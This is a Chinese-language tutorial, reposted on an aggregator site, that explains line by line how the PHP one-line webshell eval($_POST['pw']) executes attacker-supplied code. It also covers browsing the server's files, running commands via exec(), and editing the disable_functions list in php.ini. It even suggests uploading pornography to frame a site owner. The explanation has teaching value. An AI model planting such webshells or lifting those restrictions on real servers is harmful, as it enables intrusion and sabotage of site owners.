在很多的滲透過程中，滲透人員會上傳一句話木馬(簡稱webshell)到目前web服務目錄繼而提權獲取系統權限，不論asp、php、jsp、aspx都是如此，那么一句話木馬到底是如何執行的呢，下面我們就對webshell進行一個簡單的分析。

首先我們先看一個原始而又簡單的php一句話木馬。

看到這里不得不贊美前輩的智慧。

對于一個稍微懂一些php的人而言，或者初級的安全愛好者，或者腳本小子而言，看到的第一眼就是密碼是cmd，通過post提交數據，但是具體如何執行的，卻不得而知，下面我們分析一句話是如何執行的。

這句話什么意思呢？

php的代碼要寫在<?php ? ?>里面，服務器才能認出來這是php代碼，然后才去解析。

@符號的意思是不報錯。

例如：

如果沒有@，如下圖，就會報錯

為什么呢？

因為一個變量沒有定義，就被拿去使用了，

服務器就善意的提醒：Notice，你的xxx變量沒有定義。

這不就暴露了密碼嗎？

所以加上@

為什么pw是密碼呢？

那就要來理解這句話的意思了

php里面幾個超全局變量

$_GET、$_POST就是其中之一

$_POST['a'];

意思就是a這個變量，用post的方法接收。

(傳輸數據的兩種方法，get、post，post是在消息體存放數據，get是在消息頭的url路徑里存放數據(例如xxx.php?a=2))

eval()

把字符串作為PHP代碼執行

例如：eval("echo 'a'");其實就等于直接 echo 'a';

再來看看<?php eval($_POST['pw']); ?>

首先，用post方式接收變量pw，比如接收到了：pw=echo 'a';

這時代碼就變成<?php eval("echo 'a';"); ?>

結果：

連起來意思就是：

用post方法接收變量pw,把變量pw里面的字符串當做php代碼來執行

所以也就能這么玩：

也就是說，你想執行什么代碼，就把什么代碼放進變量pw里，用post傳輸給一句話木馬

你想查看目標硬盤里有沒有小黃片，可以用php函數：opendir()和readdir()等等

想上傳點小黃片，誣陷站主，就用php函數：move_uploaded_file，當然相應的html要寫好

你想執行cmd命令，則用exec()

當然前提是：

php配置文件php.ini里，關掉安全模式safe_mode = off，

然后在看看 禁用函數列表 disable_functions = proc_open, popen, exec, system, shell_exec ，把exec去掉，確保沒有exec。

(有些cms為了方便處理某些功能，會去掉的)

看看效果：

其實可以很明顯看明白，其實執行的命令就和我們前面寫的哪樣進行輸入輸出，執行系統命令操作。

所以只要webshell有足夠高的權限，可以做任何你想做的事情。

總結

以上是生活随笔為你收集整理的一句话木马绕过linux安全模式,一句话木马（webshell）是如何执行命令的的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。